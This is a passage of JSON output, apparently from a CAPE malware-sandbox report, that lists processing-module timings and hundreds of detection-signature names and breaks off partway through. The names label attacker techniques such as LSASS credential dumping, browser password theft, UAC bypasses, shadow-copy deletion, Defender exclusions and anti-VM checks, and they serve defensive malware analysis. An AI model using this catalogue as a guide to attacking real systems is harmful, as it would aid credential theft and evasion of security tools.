{
  "statistics": {
    "processing": [
      {
        "name": "CAPE",
        "time": 2.92
      },
      {
        "name": "AnalysisInfo",
        "time": 0.045
      },
      {
        "name": "BehaviorAnalysis",
        "time": 0.285
      },
      {
        "name": "Debug",
        "time": 0.002
      },
      {
        "name": "NetworkAnalysis",
        "time": 0.314
      },
      {
        "name": "UrlAnalysis",
        "time": 0.0
      },
      {
        "name": "script_log_processing",
        "time": 0.0
      },
      {
        "name": "ProcessMemory",
        "time": 0.0
      }
    ],
    "signatures": [
      {
        "name": "packer_themida",
        "time": 0.0
      },
      {
        "name": "stealth_network",
        "time": 0.0
      },
      {
        "name": "disable_driver_via_blocklist",
        "time": 0.0
      },
      {
        "name": "disable_driver_via_hvcidisallowedimages",
        "time": 0.0
      },
      {
        "name": "disable_hypervisor_protected_code_integrity",
        "time": 0.0
      },
      {
        "name": "pendingfilerenameoperations_Operations",
        "time": 0.0
      },
      {
        "name": "anomalous_deletefile",
        "time": 0.0
      },
      {
        "name": "antiav_360_libs",
        "time": 0.0
      },
      {
        "name": "antiav_ahnlab_libs",
        "time": 0.0
      },
      {
        "name": "antiav_avast_libs",
        "time": 0.0
      },
      {
        "name": "antiav_bitdefender_libs",
        "time": 0.0
      },
      {
        "name": "antiav_bullguard_libs",
        "time": 0.0
      },
      {
        "name": "antiav_emsisoft_libs",
        "time": 0.0
      },
      {
        "name": "antiav_qurb_libs",
        "time": 0.0
      },
      {
        "name": "antiav_servicestop",
        "time": 0.0
      },
      {
        "name": "antiav_apioverride_libs",
        "time": 0.0
      },
      {
        "name": "antidebug_guardpages",
        "time": 0.0
      },
      {
        "name": "antidebug_ntcreatethreadex",
        "time": 0.0
      },
      {
        "name": "antiav_nthookengine_libs",
        "time": 0.0
      },
      {
        "name": "antidebug_outputdebugstring",
        "time": 0.0
      },
      {
        "name": "antidebug_setunhandledexceptionfilter",
        "time": 0.0
      },
      {
        "name": "antidebug_windows",
        "time": 0.0
      },
      {
        "name": "antiemu_wine_func",
        "time": 0.0
      },
      {
        "name": "antisandbox_cuckoocrash",
        "time": 0.0
      },
      {
        "name": "antisandbox_foregroundwindows",
        "time": 0.0
      },
      {
        "name": "antisandbox_mouse_hook",
        "time": 0.0
      },
      {
        "name": "mouse_movement_detect",
        "time": 0.0
      },
      {
        "name": "antisandbox_sboxie_libs",
        "time": 0.0
      },
      {
        "name": "antisandbox_sboxie_objects",
        "time": 0.0
      },
      {
        "name": "antisandbox_script_timer",
        "time": 0.0
      },
      {
        "name": "antisandbox_sleep",
        "time": 0.0
      },
      {
        "name": "antisandbox_sunbelt_libs",
        "time": 0.0
      },
      {
        "name": "antisandbox_unhook",
        "time": 0.0
      },
      {
        "name": "antivm_directory_objects",
        "time": 0.0
      },
      {
        "name": "antivm_generic_disk",
        "time": 0.0
      },
      {
        "name": "antivm_generic_scsi",
        "time": 0.0
      },
      {
        "name": "antivm_generic_services",
        "time": 0.0
      },
      {
        "name": "antivm_generic_system",
        "time": 0.0
      },
      {
        "name": "antivm_checks_available_memory",
        "time": 0.0
      },
      {
        "name": "detect_virtualization_via_recent_files",
        "time": 0.0
      },
      {
        "name": "antivm_vbox_libs",
        "time": 0.0
      },
      {
        "name": "antivm_vbox_window",
        "time": 0.0
      },
      {
        "name": "antivm_vmware_events",
        "time": 0.0
      },
      {
        "name": "antivm_vmware_libs",
        "time": 0.0
      },
      {
        "name": "api_spamming",
        "time": 0.0
      },
      {
        "name": "api_uuidfromstringa",
        "time": 0.0
      },
      {
        "name": "bcdedit_command",
        "time": 0.0
      },
      {
        "name": "bootkit",
        "time": 0.0
      },
      {
        "name": "potential_overwrite_mbr",
        "time": 0.0
      },
      {
        "name": "suspicious_ioctl_scsipassthough",
        "time": 0.0
      },
      {
        "name": "suspicious_iocontrol_codes",
        "time": 0.0
      },
      {
        "name": "browser_needed",
        "time": 0.0
      },
      {
        "name": "regsvr32_squiblydoo_dll_load",
        "time": 0.0
      },
      {
        "name": "uac_bypass_cmstp",
        "time": 0.0
      },
      {
        "name": "uac_bypass_eventvwr",
        "time": 0.0
      },
      {
        "name": "uac_bypass_windows_Backup",
        "time": 0.0
      },
      {
        "name": "dotnet_code_compile",
        "time": 0.0
      },
      {
        "name": "queries_computer_name",
        "time": 0.0
      },
      {
        "name": "queries_user_name",
        "time": 0.0
      },
      {
        "name": "creates_largekey",
        "time": 0.0
      },
      {
        "name": "creates_nullvalue",
        "time": 0.0
      },
      {
        "name": "access_windows_passwords_vault",
        "time": 0.0
      },
      {
        "name": "dump_lsa_via_windows_error_reporting",
        "time": 0.0
      },
      {
        "name": "lsass_credential_dumping",
        "time": 0.0
      },
      {
        "name": "critical_process",
        "time": 0.0
      },
      {
        "name": "cryptopool_domains",
        "time": 0.0
      },
      {
        "name": "dead_connect",
        "time": 0.0
      },
      {
        "name": "dead_link",
        "time": 0.0
      },
      {
        "name": "debugs_self",
        "time": 0.0
      },
      {
        "name": "decoy_document",
        "time": 0.0
      },
      {
        "name": "decoy_image",
        "time": 0.0
      },
      {
        "name": "deletes_consolehost_history",
        "time": 0.0
      },
      {
        "name": "deletes_shadow_copies",
        "time": 0.0
      },
      {
        "name": "deletes_system_state_backup",
        "time": 0.0
      },
      {
        "name": "dep_bypass",
        "time": 0.0
      },
      {
        "name": "dep_disable",
        "time": 0.0
      },
      {
        "name": "disables_mappeddrives_autodisconnect",
        "time": 0.0
      },
      {
        "name": "disables_wfp",
        "time": 0.0
      },
      {
        "name": "add_windows_defender_exclusions",
        "time": 0.0
      },
      {
        "name": "dll_load_uncommon_file_types",
        "time": 0.0
      },
      {
        "name": "document_script_exe_drop",
        "time": 0.0
      },
      {
        "name": "guloader_apis",
        "time": 0.0
      },
      {
        "name": "driver_load",
        "time": 0.0
      },
      {
        "name": "dynamic_function_loading",
        "time": 0.0
      },
      {
        "name": "encrypted_ioc",
        "time": 0.0
      },
      {
        "name": "exec_crash",
        "time": 0.0
      },
      {
        "name": "process_creation_suspicious_location",
        "time": 0.0
      },
      {
        "name": "exploit_getbasekerneladdress",
        "time": 0.0
      },
      {
        "name": "exploit_gethaldispatchtable",
        "time": 0.0
      },
      {
        "name": "exploit_heapspray",
        "time": 0.0
      },
      {
        "name": "koadic_apis",
        "time": 0.0
      },
      {
        "name": "koadic_network_activity",
        "time": 0.0
      },
      {
        "name": "downloads_from_filehosting",
        "time": 0.0
      },
      {
        "name": "generic_phish",
        "time": 0.0
      },
      {
        "name": "http_request",
        "time": 0.0
      },
      {
        "name": "infostealer_browser",
        "time": 0.0
      },
      {
        "name": "infostealer_browser_password",
        "time": 0.0
      },
      {
        "name": "infostealer_cookies",
        "time": 0.0
      },
      {
        "name": "cryptbot_network",
        "time": 0.0
      },
      {
        "name": "infostealer_keylog",
        "time": 0.0
      },
      {
        "name": "masslogger_artifacts",
        "time": 0.0
      },
      {
        "name": "purplewave_network_activity",
        "time": 0.0
      },
      {
        "name": "quilclipper_behavior",
        "time": 0.0
      },
      {
        "name": "raccoon_behavior",
        "time": 0.0
      },
      {
        "name": "captures_screenshot",
        "time": 0.0
      },
      {
        "name": "vidar_behavior",
        "time": 0.0
      },
      {
        "name": "injection_createremotethread",
        "time": 0.0
      },
      {
        "name": "creates_suspended_process",
        "time": 0.0
      },
      {
        "name": "injection_explorer",
        "time": 0.0
      },
      {
        "name": "injection_needextension",
        "time": 0.0
      },
      {
        "name": "injection_network_traffic",
        "time": 0.0
      },
      {
        "name": "injection_runpe",
        "time": 0.0
      },
      {
        "name": "injection_rwx",
        "time": 0.0
      },
      {
        "name": "injection_themeinitapihook",
        "time": 0.0
      },
      {
        "name": "resumethread_remote_process",
        "time": 0.0
      },
      {
        "name": "injection_write_exe_process",
        "time": 0.0
      },
      {
        "name": "injection_write_process",
        "time": 0.0
      },
      {
        "name": "internet_dropper",
        "time": 0.0
      },
      {
        "name": "escalate_privilege_via_named_pipe",
        "time": 0.0
      },
      {
        "name": "ipc_namedpipe",
        "time": 0.0
      },
      {
        "name": "js_phish",
        "time": 0.0
      },
      {
        "name": "js_suspicious_redirect",
        "time": 0.0
      },
      {
        "name": "loader_alien",
        "time": 0.0
      },
      {
        "name": "execute_binary_via_internet_explorer_exporter",
        "time": 0.0
      },
      {
        "name": "execute_binary_via_run_exe_helper_utility",
        "time": 0.0
      },
      {
        "name": "execute_ps_via_syncappvpublishingserver",
        "time": 0.0
      },
      {
        "name": "malicious_dynamic_function_loading",
        "time": 0.0
      },
      {
        "name": "encrypt_pcinfo",
        "time": 0.0
      },
      {
        "name": "encrypt_data_agenttesla_http",
        "time": 0.0
      },
      {
        "name": "encrypt_data_agentteslat2_http",
        "time": 0.0
      },
      {
        "name": "encrypt_data_nanocore",
        "time": 0.0
      },
      {
        "name": "reads_memory_remote_process",
        "time": 0.0
      },
      {
        "name": "mimics_filetime",
        "time": 0.0
      },
      {
        "name": "amsi_bypass_via_com_registry",
        "time": 0.0
      },
      {
        "name": "access_auto_logons_via_registry",
        "time": 0.0
      },
      {
        "name": "access_boot_key_via_registry",
        "time": 0.0
      },
      {
        "name": "create_suspicious_lnk_files",
        "time": 0.0
      },
      {
        "name": "credential_access_via_windows_credential_history",
        "time": 0.0
      },
      {
        "name": "dll_hijacking_via_microsoft_exchange",
        "time": 0.0
      },
      {
        "name": "dll_hijacking_via_waas_medic_svc_com_typelib",
        "time": 0.0
      },
      {
        "name": "execute_file_downloaded_via_openssh",
        "time": 0.0
      },
      {
        "name": "execute_safe_mode_from_suspicious_process",
        "time": 0.0
      },
      {
        "name": "execute_scripts_via_microsoft_management_console",
        "time": 0.0
      },
      {
        "name": "execute_suspicious_processes_via_windows_mssql_service",
        "time": 0.0
      },
      {
        "name": "execution_from_self_extracting_archive",
        "time": 0.0
      },
      {
        "name": "ip_address_discovery_via_trusted_program",
        "time": 0.0
      },
      {
        "name": "load_dll_via_control_panel",
        "time": 0.0
      },
      {
        "name": "network_connection_via_suspicious_process",
        "time": 0.0
      },
      {
        "name": "potential_location_discovery_via_unusual_process",
        "time": 0.0
      },
      {
        "name": "store_executable_registry",
        "time": 0.0
      },
      {
        "name": "Suspicious_Execution_Via_MicrosoftExchangeTransportAgent",
        "time": 0.0
      },
      {
        "name": "suspicious_java_execution_via_win_scripts",
        "time": 0.0
      },
      {
        "name": "Suspicious_Scheduled_Task_Creation_Via_Masqueraded_XML_File",
        "time": 0.0
      },
      {
        "name": "uses_restart_manager_for_suspicious_activities",
        "time": 0.0
      },
      {
        "name": "modify_desktop_wallpaper",
        "time": 0.0
      },
      {
        "name": "modify_zoneid_ads",
        "time": 0.0
      },
      {
        "name": "move_file_on_reboot",
        "time": 0.0
      },
      {
        "name": "multiple_useragents",
        "time": 0.0
      },
      {
        "name": "network_anomaly",
        "time": 0.0
      },
      {
        "name": "network_bind",
        "time": 0.0
      },
      {
        "name": "network_cnc_https_archive",
        "time": 0.0
      },
      {
        "name": "network_cnc_https_free_webshoting",
        "time": 0.0
      },
      {
        "name": "network_cnc_https_generic",
        "time": 0.0
      },
      {
        "name": "network_cnc_https_temp_urldns",
        "time": 0.0
      },
      {
        "name": "network_cnc_https_opensource",
        "time": 0.0
      },
      {
        "name": "network_cnc_https_pastesite",
        "time": 0.0
      },
      {
        "name": "network_cnc_https_payload",
        "time": 0.0
      },
      {
        "name": "network_cnc_https_serviceinterface",
        "time": 0.0
      },
      {
        "name": "network_cnc_https_socialmedia",
        "time": 0.0
      },
      {
        "name": "network_cnc_https_telegram",
        "time": 0.0
      },
      {
        "name": "network_cnc_https_tempstorage",
        "time": 0.0
      },
      {
        "name": "network_cnc_https_urlshortener",
        "time": 0.0
      },
      {
        "name": "network_cnc_https_useragent",
        "time": 0.0
      },
      {
        "name": "network_cnc_smtps_exfil",
        "time": 0.0
      },
      {
        "name": "network_cnc_smtps_generic",
        "time": 0.0
      },
      {
        "name": "network_dns_idn",
        "time": 0.0
      },
      {
        "name": "network_dns_suspicious_querytype",
        "time": 0.0
      },
      {
        "name": "network_dns_tunneling_request",
        "time": 0.0
      },
      {
        "name": "network_document_http",
        "time": 0.0
      },
      {
        "name": "explorer_http",
        "time": 0.0
      },
      {
        "name": "network_fake_useragent",
        "time": 0.0
      },
      {
        "name": "legitimate_domain_abuse",
        "time": 0.0
      },
      {
        "name": "suspicious_communication_trusted_site",
        "time": 0.0
      },
      {
        "name": "network_document_file",
        "time": 0.0
      },
      {
        "name": "network_tor",
        "time": 0.0
      },
      {
        "name": "office_com_load",
        "time": 0.0
      },
      {
        "name": "office_dotnet_load",
        "time": 0.0
      },
      {
        "name": "office_mshtml_load",
        "time": 0.0
      },
      {
        "name": "office_vb_load",
        "time": 0.0
      },
      {
        "name": "office_wmi_load",
        "time": 0.0
      },
      {
        "name": "office_cve2017_11882",
        "time": 0.0
      },
      {
        "name": "office_cve2017_11882_network",
        "time": 0.0
      },
      {
        "name": "office_cve_2021_40444",
        "time": 0.0
      },
      {
        "name": "office_cve_2021_40444_m2",
        "time": 0.0
      },
      {
        "name": "office_flash_load",
        "time": 0.0
      },
      {
        "name": "office_postscript",
        "time": 0.0
      },
      {
        "name": "office_suspicious_processes",
        "time": 0.0
      },
      {
        "name": "office_write_exe",
        "time": 0.0
      },
      {
        "name": "persistence_via_autodial_dll_registry",
        "time": 0.0
      },
      {
        "name": "persistence_autorun",
        "time": 0.0
      },
      {
        "name": "persistence_autorun_tasks",
        "time": 0.0
      },
      {
        "name": "persistence_bootexecute",
        "time": 0.0
      },
      {
        "name": "persistence_registry_script",
        "time": 0.0
      },
      {
        "name": "powershell_network_connection",
        "time": 0.0
      },
      {
        "name": "powershell_download",
        "time": 0.0
      },
      {
        "name": "powershell_request",
        "time": 0.0
      },
      {
        "name": "createtoolhelp32snapshot_module_enumeration",
        "time": 0.0
      },
      {
        "name": "enumerates_running_processes",
        "time": 0.0
      },
      {
        "name": "process_interest",
        "time": 0.0
      },
      {
        "name": "process_needed",
        "time": 0.0
      },
      {
        "name": "mass_data_encryption",
        "time": 0.0
      },
      {
        "name": "ransomware_file_modifications",
        "time": 0.0
      },
      {
        "name": "nemty_network_activity",
        "time": 0.0
      },
      {
        "name": "nemty_note",
        "time": 0.0
      },
      {
        "name": "sodinokibi_behavior",
        "time": 0.0
      },
      {
        "name": "stop_ransomware_registry",
        "time": 0.0
      },
      {
        "name": "blackrat_apis",
        "time": 0.0
      },
      {
        "name": "blackrat_network_activity",
        "time": 0.0
      },
      {
        "name": "blackrat_registry_keys",
        "time": 0.0
      },
      {
        "name": "dcrat_behavior",
        "time": 0.0
      },
      {
        "name": "karagany_system_event_objects",
        "time": 0.0
      },
      {
        "name": "rat_luminosity",
        "time": 0.0
      },
      {
        "name": "rat_nanocore",
        "time": 0.0
      },
      {
        "name": "netwire_behavior",
        "time": 0.0
      },
      {
        "name": "obliquerat_network_activity",
        "time": 0.0
      },
      {
        "name": "orcusrat_behavior",
        "time": 0.0
      },
      {
        "name": "trochilusrat_apis",
        "time": 0.0
      },
      {
        "name": "reads_self",
        "time": 0.0
      },
      {
        "name": "recon_beacon",
        "time": 0.0
      },
      {
        "name": "recon_programs",
        "time": 0.0
      },
      {
        "name": "recon_systeminfo",
        "time": 0.0
      },
      {
        "name": "accesses_recyclebin",
        "time": 0.0
      },
      {
        "name": "remcos_shell_code_dynamic_wrapper_x",
        "time": 0.0
      },
      {
        "name": "script_created_process",
        "time": 0.0
      },
      {
        "name": "script_network_activity",
        "time": 0.0
      },
      {
        "name": "suspicious_js_script",
        "time": 0.0
      },
      {
        "name": "javascript_timer",
        "time": 0.0
      },
      {
        "name": "secure_login_phishing",
        "time": 0.0
      },
      {
        "name": "securityxploded_modules",
        "time": 0.0
      },
      {
        "name": "get_clipboard_data",
        "time": 0.0
      },
      {
        "name": "sets_autoconfig_url",
        "time": 0.0
      },
      {
        "name": "spoofs_procname",
        "time": 0.0
      },
      {
        "name": "stack_pivot",
        "time": 0.0
      },
      {
        "name": "stack_pivot_file_created",
        "time": 0.0
      },
      {
        "name": "stack_pivot_process_create",
        "time": 0.0
      },
      {
        "name": "set_clipboard_data",
        "time": 0.0
      },
      {
        "name": "stealth_childproc",
        "time": 0.0
      },
      {
        "name": "stealth_file",
        "time": 0.0
      },
      {
        "name": "stealth_system_procname",
        "time": 0.0
      },
      {
        "name": "stealth_timeout",
        "time": 0.0
      },
      {
        "name": "stealth_window",
        "time": 0.0
      },
      {
        "name": "queries_keyboard_layout",
        "time": 0.0
      },
      {
        "name": "queries_locale_api",
        "time": 0.0
      },
      {
        "name": "terminates_remote_process",
        "time": 0.0
      },
      {
        "name": "uiautomationcore_load",
        "time": 0.0
      },
      {
        "name": "user_enum",
        "time": 0.0
      },
      {
        "name": "virus",
        "time": 0.0
      },
      {
        "name": "neshta_files",
        "time": 0.0
      },
      {
        "name": "neshta_regkeys",
        "time": 0.0
      },
      {
        "name": "webmail_phish",
        "time": 0.0
      },
      {
        "name": "persists_dev_util",
        "time": 0.0
      },
      {
        "name": "spawns_dev_util",
        "time": 0.0
      },
      {
        "name": "alters_windows_utility",
        "time": 0.0
      },
      {
        "name": "overwrites_accessibility_utility",
        "time": 0.0
      },
      {
        "name": "Potential_Lateral_Movement_Via_SMBEXEC",
        "time": 0.0
      },
      {
        "name": "potential_WebShell_Via_ScreenConnectServer",
        "time": 0.0
      },
      {
        "name": "uses_Microsoft_HTML_Help_Executable",
        "time": 0.0
      },
      {
        "name": "wiper_zeroedbytes",
        "time": 0.0
      },
      {
        "name": "wmi_create_process",
        "time": 0.0
      },
      {
        "name": "wmi_script_process",
        "time": 0.0
      },
      {
        "name": "antianalysis_tls_section",
        "time": 0.0
      },
      {
        "name": "antivirus_clamav",
        "time": 0.0
      },
      {
        "name": "antivirus_virustotal",
        "time": 0.0
      },
      {
        "name": "bad_certs",
        "time": 0.0
      },
      {
        "name": "bad_ssl_certs",
        "time": 0.0
      },
      {
        "name": "banker_zeus_p2p",
        "time": 0.0
      },
      {
        "name": "banker_zeus_url",
        "time": 0.0
      },
      {
        "name": "binary_yara",
        "time": 0.0
      },
      {
        "name": "bot_athenahttp",
        "time": 0.0
      },
      {
        "name": "bot_dirtjumper",
        "time": 0.0
      },
      {
        "name": "bot_drive",
        "time": 0.0
      },
      {
        "name": "bot_drive2",
        "time": 0.0
      },
      {
        "name": "bot_madness",
        "time": 0.0
      },
      {
        "name": "phishing_kit_detected",
        "time": 0.0
      },
      {
        "name": "family_proxyback",
        "time": 0.0
      },
      {
        "name": "flare_capa_antianalysis",
        "time": 0.0
      },
      {
        "name": "flare_capa_collection",
        "time": 0.0
      },
      {
        "name": "flare_capa_communication",
        "time": 0.0
      },
      {
        "name": "flare_capa_compiler",
        "time": 0.0
      },
      {
        "name": "flare_capa_datamanipulation",
        "time": 0.0
      },
      {
        "name": "flare_capa_executable",
        "time": 0.0
      },
      {
        "name": "flare_capa_hostinteraction",
        "time": 0.0
      },
      {
        "name": "flare_capa_impact",
        "time": 0.0
      },
      {
        "name": "flare_capa_lib",
        "time": 0.0
      },
      {
        "name": "flare_capa_linking",
        "time": 0.0
      },
      {
        "name": "flare_capa_loadcode",
        "time": 0.0
      },
      {
        "name": "flare_capa_malwarefamily",
        "time": 0.0
      },
      {
        "name": "flare_capa_nursery",
        "time": 0.0
      },
      {
        "name": "flare_capa_persistence",
        "time": 0.0
      },
      {
        "name": "flare_capa_runtime",
        "time": 0.0
      },
      {
        "name": "flare_capa_targeting",
        "time": 0.0
      },
      {
        "name": "threatfox",
        "time": 0.0
      },
      {
        "name": "log4shell",
        "time": 0.0
      },
      {
        "name": "mimics_extension",
        "time": 0.0
      },
      {
        "name": "network_country_distribution",
        "time": 0.0
      },
      {
        "name": "network_cnc_http",
        "time": 0.0
      },
      {
        "name": "network_ip_exe",
        "time": 0.0
      },
      {
        "name": "network_dga",
        "time": 0.0
      },
      {
        "name": "network_dga_fraunhofer",
        "time": 0.0
      },
      {
        "name": "network_dyndns",
        "time": 0.004
      },
      {
        "name": "network_excessive_udp",
        "time": 0.0
      },
      {
        "name": "network_http",
        "time": 0.0
      },
      {
        "name": "network_icmp",
        "time": 0.0
      },
      {
        "name": "network_irc",
        "time": 0.0
      },
      {
        "name": "network_open_proxy",
        "time": 0.0
      },
      {
        "name": "network_questionable_http_path",
        "time": 0.0
      },
      {
        "name": "network_questionable_https_path",
        "time": 0.0
      },
      {
        "name": "network_smtp",
        "time": 0.0
      },
      {
        "name": "network_torgateway",
        "time": 0.001
      },
      {
        "name": "origin_langid",
        "time": 0.0
      },
      {
        "name": "origin_resource_langid",
        "time": 0.0
      },
      {
        "name": "overlay",
        "time": 0.0
      },
      {
        "name": "packer_unknown_pe_section_name",
        "time": 0.0
      },
      {
        "name": "packer_aspack",
        "time": 0.0
      },
      {
        "name": "packer_aspirecrypt",
        "time": 0.0
      },
      {
        "name": "packer_bedsprotector",
        "time": 0.0
      },
      {
        "name": "packer_confuser",
        "time": 0.0
      },
      {
        "name": "packer_enigma",
        "time": 0.0
      },
      {
        "name": "packer_entropy",
        "time": 0.0
      },
      {
        "name": "packer_mpress",
        "time": 0.0
      },
      {
        "name": "packer_nate",
        "time": 0.0
      },
      {
        "name": "packer_nspack",
        "time": 0.0
      },
      {
        "name": "packer_smartassembly",
        "time": 0.0
      },
      {
        "name": "packer_spices",
        "time": 0.0
      },
      {
        "name": "packer_themida",
        "time": 0.0
      },
      {
        "name": "packer_titan",
        "time": 0.0
      },
      {
        "name": "packer_upx",
        "time": 0.0
      },
      {
        "name": "packer_vmprotect",
        "time": 0.0
      },
      {
        "name": "packer_yoda",
        "time": 0.0
      },
      {
        "name": "pdf_annot_urls_checker",
        "time": 0.0
      },
      {
        "name": "polymorphic",
        "time": 0.0
      },
      {
        "name": "punch_plus_plus_pcres",
        "time": 0.0
      },
      {
        "name": "procmem_yara",
        "time": 0.0
      },
      {
        "name": "recon_checkip",
        "time": 0.0
      },
      {
        "name": "static_authenticode",
        "time": 0.0
      },
      {
        "name": "invalid_authenticode_signature",
        "time": 0.0
      },
      {
        "name": "static_dotnet_anomaly",
        "time": 0.0
      },
      {
        "name": "static_java",
        "time": 0.0
      },
      {
        "name": "static_pdf",
        "time": 0.0
      },
      {
        "name": "contains_pe_overlay",
        "time": 0.0
      },
      {
        "name": "static_pe_anomaly",
        "time": 0.0
      },
      {
        "name": "pe_compile_timestomping",
        "time": 0.0
      },
      {
        "name": "static_pe_pdbpath",
        "time": 0.0
      },
      {
        "name": "static_rat_config",
        "time": 0.0
      },
      {
        "name": "static_versioninfo_anomaly",
        "time": 0.0
      },
      {
        "name": "suricata_alert",
        "time": 0.0
      },
      {
        "name": "suspicious_html_body",
        "time": 0.0
      },
      {
        "name": "suspicious_html_name",
        "time": 0.0
      },
      {
        "name": "suspicious_html_title",
        "time": 0.0
      },
      {
        "name": "volatility_devicetree_1",
        "time": 0.0
      },
      {
        "name": "volatility_handles_1",
        "time": 0.0
      },
      {
        "name": "volatility_ldrmodules_1",
        "time": 0.0
      },
      {
        "name": "volatility_ldrmodules_2",
        "time": 0.0
      },
      {
        "name": "volatility_malfind_1",
        "time": 0.0
      },
      {
        "name": "volatility_malfind_2",
        "time": 0.0
      },
      {
        "name": "volatility_modscan_1",
        "time": 0.0
      },
      {
        "name": "volatility_svcscan_1",
        "time": 0.0
      },
      {
        "name": "volatility_svcscan_2",
        "time": 0.0
      },
      {
        "name": "volatility_svcscan_3",
        "time": 0.0
      },
      {
        "name": "whois_create",
        "time": 0.0
      },
      {
        "name": "accesses_mailslot",
        "time": 0.0
      },
      {
        "name": "accesses_netlogon_regkey",
        "time": 0.001
      },
      {
        "name": "accesses_public_folder",
        "time": 0.0
      },
      {
        "name": "accesses_sysvol",
        "time": 0.0
      },
      {
        "name": "writes_sysvol",
        "time": 0.0
      },
      {
        "name": "adds_admin_user",
        "time": 0.0
      },
      {
        "name": "adds_user",
        "time": 0.0
      },
      {
        "name": "overwrites_admin_password",
        "time": 0.0
      },
      {
        "name": "antianalysis_detectfile",
        "time": 0.004
      },
      {
        "name": "antianalysis_detectreg",
        "time": 0.036
      },
      {
        "name": "modify_attachment_manager",
        "time": 0.0
      },
      {
        "name": "antiav_detectfile",
        "time": 0.007
      },
      {
        "name": "antiav_detectreg",
        "time": 0.18
      },
      {
        "name": "antiav_srp",
        "time": 0.0
      },
      {
        "name": "antiav_whitespace",
        "time": 0.0
      },
      {
        "name": "antidebug_devices",
        "time": 0.001
      },
      {
        "name": "antiemu_windefend",
        "time": 0.0
      },
      {
        "name": "antiemu_wine_reg",
        "time": 0.0
      },
      {
        "name": "antisandbox_cuckoo_files",
        "time": 0.0
      },
      {
        "name": "antisandbox_fortinet_files",
        "time": 0.0
      },
      {
        "name": "antisandbox_joe_anubis_files",
        "time": 0.0
      },
      {
        "name": "antisandbox_sboxie_mutex",
        "time": 0.0
      },
      {
        "name": "antisandbox_sunbelt_files",
        "time": 0.0
      },
      {
        "name": "antisandbox_threattrack_files",
        "time": 0.0
      },
      {
        "name": "antivm_bochs_keys",
        "time": 0.003
      },
      {
        "name": "antivm_generic_bios",
        "time": 0.003
      },
      {
        "name": "antivm_generic_diskreg",
        "time": 0.007
      },
      {
        "name": "antivm_hyperv_keys",
        "time": 0.003
      },
      {
        "name": "antivm_parallels_keys",
        "time": 0.01
      },
      {
        "name": "antivm_recentdocs",
        "time": 0.0
      },
      {
        "name": "antivm_vbox_devices",
        "time": 0.001
      },
      {
        "name": "antivm_vbox_files",
        "time": 0.003
      },
      {
        "name": "antivm_vbox_keys",
        "time": 0.023
      },
      {
        "name": "antivm_vmware_devices",
        "time": 0.0
      },
      {
        "name": "antivm_vmware_files",
        "time": 0.001
      },
      {
        "name": "antivm_vmware_keys",
        "time": 0.012
      },
      {
        "name": "antivm_vmware_mutexes",
        "time": 0.0
      },
      {
        "name": "antivm_vpc_files",
        "time": 0.0
      },
      {
        "name": "antivm_vpc_keys",
        "time": 0.01
      },
      {
        "name": "antivm_vpc_mutex",
        "time": 0.0
      },
      {
        "name": "antivm_xen_keys",
        "time": 0.01
      },
      {
        "name": "asyncrat_mutex",
        "time": 0.0
      },
      {
        "name": "gulpix_behavior",
        "time": 0.0
      },
      {
        "name": "ketrican_regkeys",
        "time": 0.002
      },
      {
        "name": "okrum_mutexes",
        "time": 0.0
      },
      {
        "name": "banker_cridex",
        "time": 0.0
      },
      {
        "name": "geodo_banking_trojan",
        "time": 0.005
      },
      {
        "name": "banker_spyeye_mutexes",
        "time": 0.0
      },
      {
        "name": "banker_zeus_mutex",
        "time": 0.0
      },
      {
        "name": "bitcoin_opencl",
        "time": 0.0
      },
      {
        "name": "accesses_primary_patition",
        "time": 0.0
      },
      {
        "name": "direct_hdd_access",
        "time": 0.0
      },
      {
        "name": "enumerates_physical_drives",
        "time": 0.0
      },
      {
        "name": "physical_drive_access",
        "time": 0.0
      },
      {
        "name": "bot_russkill",
        "time": 0.0
      },
      {
        "name": "browser_addon",
        "time": 0.0
      },
      {
        "name": "chromium_browser_extension_directory",
        "time": 0.0
      },
      {
        "name": "browser_helper_object",
        "time": 0.0
      },
      {
        "name": "browser_security",
        "time": 0.001
      },
      {
        "name": "browser_startpage",
        "time": 0.0
      },
      {
        "name": "ie_disables_process_tab",
        "time": 0.0
      },
      {
        "name": "odbcconf_bypass",
        "time": 0.0
      },
      {
        "name": "squiblydoo_bypass",
        "time": 0.0
      },
      {
        "name": "squiblytwo_bypass",
        "time": 0.0
      },
      {
        "name": "bypass_chromium_protection",
        "time": 0.0
      },
      {
        "name": "bypass_firewall",
        "time": 0.003
      },
      {
        "name": "checks_uac_status",
        "time": 0.001
      },
      {
        "name": "uac_bypass_cmstpcom",
        "time": 0.0
      },
      {
        "name": "uac_bypass_delegateexecute_sdclt",
        "time": 0.0
      },
      {
        "name": "uac_bypass_fodhelper",
        "time": 0.0
      },
      {
        "name": "cape_extracted_content",
        "time": 0.0
      },
      {
        "name": "carberp_mutex",
        "time": 0.0
      },
      {
        "name": "clears_logs",
        "time": 0.0
      },
      {
        "name": "cmdline_obfuscation",
        "time": 0.0
      },
      {
        "name": "cmdline_switches",
        "time": 0.0
      },
      {
        "name": "cmdline_terminate",
        "time": 0.0
      },
      {
        "name": "cmdline_forfiles_wildcard",
        "time": 0.0
      },
      {
        "name": "cmdline_http_link",
        "time": 0.0
      },
      {
        "name": "cmdline_long_string",
        "time": 0.0
      },
      {
        "name": "cmdline_reversed_http_link",
        "time": 0.0
      },
      {
        "name": "long_commandline",
        "time": 0.0
      },
      {
        "name": "powershell_renamed_commandline",
        "time": 0.0
      },
      {
        "name": "copies_self",
        "time": 0.0
      },
      {
        "name": "credwiz_credentialaccess",
        "time": 0.0
      },
      {
        "name": "enables_wdigest",
        "time": 0.0
      },
      {
        "name": "vaultcmd_credentialaccess",
        "time": 0.0
      },
      {
        "name": "file_credential_store_access",
        "time": 0.001
      },
      {
        "name": "file_credential_store_write",
        "time": 0.0
      },
      {
        "name": "kerberos_credential_access_via_rubeus",
        "time": 0.0
      },
      {
        "name": "registry_credential_dumping",
        "time": 0.0
      },
      {
        "name": "registry_credential_store_access",
        "time": 0.001
      },
      {
        "name": "registry_lsa_secrets_access",
        "time": 0.0
      },
      {
        "name": "comsvcs_credentialdump",
        "time": 0.0
      },
      {
        "name": "cryptomining_stratum_command",
        "time": 0.0
      },
      {
        "name": "cypherit_mutexes",
        "time": 0.0
      },
      {
        "name": "darkcomet_regkeys",
        "time": 0.002
      },
      {
        "name": "datop_loader",
        "time": 0.0
      },
      {
        "name": "deepfreeze_mutex",
        "time": 0.0
      },
      {
        "name": "deletes_executed_files",
        "time": 0.0
      },
      {
        "name": "disables_app_launch",
        "time": 0.0
      },
      {
        "name": "disables_auto_app_termination",
        "time": 0.0
      },
      {
        "name": "disables_appv_virtualization",
